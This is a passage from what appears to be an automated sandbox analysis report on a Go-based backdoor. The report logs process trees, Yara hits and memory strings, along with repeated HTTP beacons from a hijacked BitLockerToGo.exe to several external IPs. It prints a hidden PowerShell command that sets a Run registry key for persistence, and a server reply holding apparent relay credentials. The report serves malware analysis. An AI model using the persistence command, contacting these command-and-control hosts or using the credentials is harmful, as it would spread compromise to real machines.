Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
Oct 18, 2024 14:09:59.688499928 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 18 Oct 2024 12:09:59 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49871 | 46.8.236.61 | 80 | 7660 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 14:09:59.696902990 CEST | 297 | OUT | POST / HTTP/1.1
Host: 46.8.236.61
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: 37YvrW9O
Accept-Encoding: gzip
Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
Oct 18, 2024 14:10:00.547857046 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 18 Oct 2024 12:10:00 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49877 | 93.185.159.253 | 80 | 7660 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 14:10:00.557034016 CEST | 300 | OUT | POST / HTTP/1.1
Host: 93.185.159.253
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: QiaIdRmS
Accept-Encoding: gzip
Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
Oct 18, 2024 14:10:01.431174994 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 18 Oct 2024 12:10:01 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49883 | 91.212.166.91 | 80 | 7660 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 14:10:01.439162016 CEST | 299 | OUT | POST / HTTP/1.1
Host: 91.212.166.91
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: 36RdBXl3
Accept-Encoding: gzip
Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
Oct 18, 2024 14:10:02.354288101 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 18 Oct 2024 12:10:02 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49889 | 188.130.206.243 | 80 | 7660 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 14:10:02.360979080 CEST | 301 | OUT | POST / HTTP/1.1
Host: 188.130.206.243
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: 6SlWWgIp
Accept-Encoding: gzip
Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
Oct 18, 2024 14:10:03.221941948 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 18 Oct 2024 12:10:03 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49984 | 46.8.232.106 | 80 | 7660 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 14:10:33.254066944 CEST | 298 | OUT | POST / HTTP/1.1
Host: 46.8.232.106
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: y7m7E0Nk
Accept-Encoding: gzip
Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
Oct 18, 2024 14:10:34.091272116 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 18 Oct 2024 12:10:33 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49985 | 46.8.236.61 | 80 | 7660 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 14:10:34.099034071 CEST | 297 | OUT | POST / HTTP/1.1
Host: 46.8.236.61
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: wUWI0IPD
Accept-Encoding: gzip
Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
Oct 18, 2024 14:10:35.096977949 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 18 Oct 2024 12:10:34 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49986 | 93.185.159.253 | 80 | 7660 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 14:10:35.104883909 CEST | 300 | OUT | POST / HTTP/1.1
Host: 93.185.159.253
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: HhKpq2Ju
Accept-Encoding: gzip
Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
Oct 18, 2024 14:10:35.996009111 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 18 Oct 2024 12:10:35 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49987 | 91.212.166.91 | 80 | 7660 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 14:10:36.002914906 CEST | 299 | OUT | POST / HTTP/1.1
Host: 91.212.166.91
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: qVSrzg77
Accept-Encoding: gzip
Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
Oct 18, 2024 14:10:37.898828983 CEST | 554 | IN | HTTP/1.1 200 OK
Date: Fri, 18 Oct 2024 12:10:37 GMT
Content-Length: 436
Content-Type: text/plain; charset=utf-8
                                    Data Raw: 31 30 39 2e 31 37 32 2e 38 38 2e 33 38 3b 32 33 39 36 31 3b 68 75 62 58 74 71 4c 36 74 4c 52 5a 70 4d 77 72 3a 71 45 4c 2f 66 72 47 2f 36 45 61 34 66 55 53 36 31 66 71 2e 30 43 6a 38 62 5a 32 2e 61 66 66 32 32 68 6a 33 36 4c 31 32 5a 49 4d 2e 38 33 5a 31 56 4a 6b 30 74 78 32 36 57 65 54 2c 41 71 42 68 54 35 67 74 62 69 48 74 30 61 6f 70 64 77 55 3a 41 66 78 2f 68 54 67 2f 61 65 34 34 46 36 73 36 4b 68 47 2e 53 6f 52 38 62 70 41 2e 5a 6d 45 32 45 63 39 33 67 58 30 36 51 44 42 2e 47 32 4b 36 4f 7a 57 31 51 65 6a 2c 6d 67 50 68 4d 32 72 74 51 39 6a 74 56 58 45 70 44 4a 53 3a 62 78 72 2f 69 67 64 2f 77 43 79 39 6d 74 6a 33 4a 6d 4f 2e 68 5a 66 31 43 51 73 38 77 44 30 35 62 62 76 2e 72 79 74 31 39 78 44 35 46 6a 38 39 33 68 75 2e 46 70 5a 32 48 50 47 35 75 39 42 33 4f 68 6e 2c 57 30 37 68 6a 49 70 74 6b 78 46 74 6d 71 4f 70 78 76 4a 3a 35 6e 53 2f 59 61 57 2f 52 61 6b 39 39 64 65 31 56 33 75 2e 55 48 6c 32 68 62 64 31 50 58 45 32 74 37 37 2e 59 33 70 31 68 62 52 36 36 4e 48 36 4d 65 6c 2e 62 76 64 39 54 [TRUNCATED]
                                    Data Ascii: 109.172.88.38;23961;hubXtqL6tLRZpMwr:qEL/frG/6Ea4fUS61fq.0Cj8bZ2.aff22hj36L12ZIM.83Z1VJk0tx26WeT,AqBhT5gtbiHt0aopdwU:Afx/hTg/ae44F6s6KhG.SoR8bpA.ZmE2Ec93gX06QDB.G2K6OzW1Qej,mgPhM2rtQ9jtVXEpDJS:bxr/igd/wCy9mtj3JmO.hZf1CQs8wD05bbv.ryt19xD5Fj893hu.FpZ2HPG5u9B3Ohn,W07hjIptkxFtmqOpxvJ:5nS/YaW/Rak99de1V3u.UHl2hbd1PXE2t77.Y3p1hbR66NH6Mel.bvd9TNd1hTP,dEZh4ONtR1jtf7Upvqq:9g4/B41/8Vo1Ash8G3W8d2c.4ku182i3p6P0Lyr.l6s2jMs0AdR6F5y.fYo2WwY4o7Z388L
                                    Oct 18, 2024 14:11:07.913865089 CEST 6 OUT Data Raw: 00
                                    Data Ascii:
                                    Oct 18, 2024 14:11:37.929724932 CEST 6 OUT Data Raw: 00
                                    Data Ascii:

                                    Target ID:0
                                    Start time:08:09:28
                                    Start date:18/10/2024
                                    Path:C:\Users\user\Desktop\BwqqVoHR71.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\BwqqVoHR71.exe"
                                    Imagebase:0x40000
                                    File size:19'172'088 bytes
                                    MD5 hash:0A21A94198F6157ABB36BF55CB43BE27
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:08:09:39
                                    Start date:18/10/2024
                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                    Imagebase:0x2d0000
                                    File size:231'736 bytes
                                    MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Source: 00000002.00000002.3158908569.000000000C008000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:4
                                    Start time:08:09:46
                                    Start date:18/10/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
                                    Imagebase:0x3f0000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:08:09:46
                                    Start date:18/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff620390000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:08:10:00
                                    Start date:18/10/2024
                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                    Imagebase:0x2d0000
                                    File size:231'736 bytes
                                    MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                      Strings
                                      • ) @s Pn=][}]i)> +)(tvrRuUeEaAlLsSbBoOxX+-nNiIfFpP+a-a25\fALAKAZARCACOCTDEFLGAHIINIAKSKYLAMEMDMAMIMNMSMOMTNENVNHNJNMNYNCNDOHOKORPARISCSDTNTXUTVTVAWAWVWIWYAEAAAPADAFAGAIAOAQASATAUAWAXBABBBDBEBFBGBHBIBJBLBMBNBOBQBRBTBVBWBYBZCCCDCFCGCHCICKCLCMCNCRCUCVCWCX, xrefs: 0007BABC
                                      • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!atlas: the image is already allocated2220446049250313080847263336181640625H, xrefs: 0007BBE8
                                      • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg,, xrefs: 0007BBB4
                                      • runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 0007BAFE
                                      • runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg, Volgogradapplication/x-bytecode.elisp (compi, xrefs: 0007BB59
                                      • bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)FillRule(%d)GetCursorPosleftshoulderrighttrigger15258789, xrefs: 0007BAD7
                                      • CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=gamepad: IDirectInputDevice8::Acquire failed: %wgraphicscommand: a screen image cannot be dumpedstrconv: illegal App, xrefs: 0007BB8D
                                      • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timergamepaddb: unexpected platform: %s3552713678800500929355621337890625Venezuela (Bolivarian , xrefs: 0007BB32
                                      • %, xrefs: 0007BBF1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1466900294.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                      • Associated: 00000000.00000002.1466862578.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1467618676.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1467618676.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1468750552.00000000011A6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1468771062.00000000011A9000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1468787806.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1468808035.00000000011AB000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1468828997.00000000011AD000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1468849235.00000000011AE000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1468906619.0000000001210000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1468928007.0000000001212000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1468949893.0000000001214000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1468979100.000000000121D000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1469005720.000000000121E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1469026831.0000000001220000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1469045041.0000000001221000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1469045041.000000000122C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1469045041.0000000001264000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1469045041.0000000001269000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1469137766.000000000126D000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1469155895.000000000126E000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1469155895.00000000012B6000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1469155895.00000000012C6000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_40000_BwqqVoHR71.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %$) @s Pn=][}]i)> +)(tvrRuUeEaAlLsSbBoOxX+-nNiIfFpP+a-a25\fALAKAZARCACOCTDEFLGAHIINIAKSKYLAMEMDMAMIMNMSMOMTNENVNHNJNMNYNCNDOHOKORPARISCSDTNTXUTVTVAWAWVWIWYAEAAAPADAFAGAIAOAQASATAUAWAXBABBBDBEBFBGBHBIBJBLBMBNBOBQBRBTBVBWBYBZCCCDCFCGCHCICKCLCMCNCRCUCVCWCX$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=gamepad: IDirectInputDevice8::Acquire failed: %wgraphicscommand: a screen image cannot be dumpedstrconv: illegal App$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timergamepaddb: unexpected platform: %s3552713678800500929355621337890625Venezuela (Bolivarian $bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)FillRule(%d)GetCursorPosleftshoulderrighttrigger15258789$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg,$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!atlas: the image is already allocated2220446049250313080847263336181640625H$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerogamepad: IDirectInputDevice8::Poll failed: %w(UTC+03:00) Moscow, St. Petersburg, Volgogradapplication/x-bytecode.elisp (compi$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
                                      • API String ID: 0-290768958
                                      • Opcode ID: fdd47b0b124b66337a7abae4947a2f0bee31cea5aae44e96c7d01d87c62a8460
                                      • Instruction ID: 2a5749a6528dd89707c109e4d801d00d69fe333c58ea4524cfca0a17dbb1afaa
                                      • Opcode Fuzzy Hash: fdd47b0b124b66337a7abae4947a2f0bee31cea5aae44e96c7d01d87c62a8460
                                      • Instruction Fuzzy Hash: 2F91CEB45087018FD390FF68D09579ABBE4BF89708F00896CE5D887392DB79A948CF52
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1584694268.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_6620000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aedc34e542f6d5ecabe7bd445826de1a693570402911a0c554cda5f10310e6d2
                                      • Instruction ID: f7cc233636bf4ef2eb9e52703aade0420edf582148d53a5c07abf2e5ad5d178d
                                      • Opcode Fuzzy Hash: aedc34e542f6d5ecabe7bd445826de1a693570402911a0c554cda5f10310e6d2
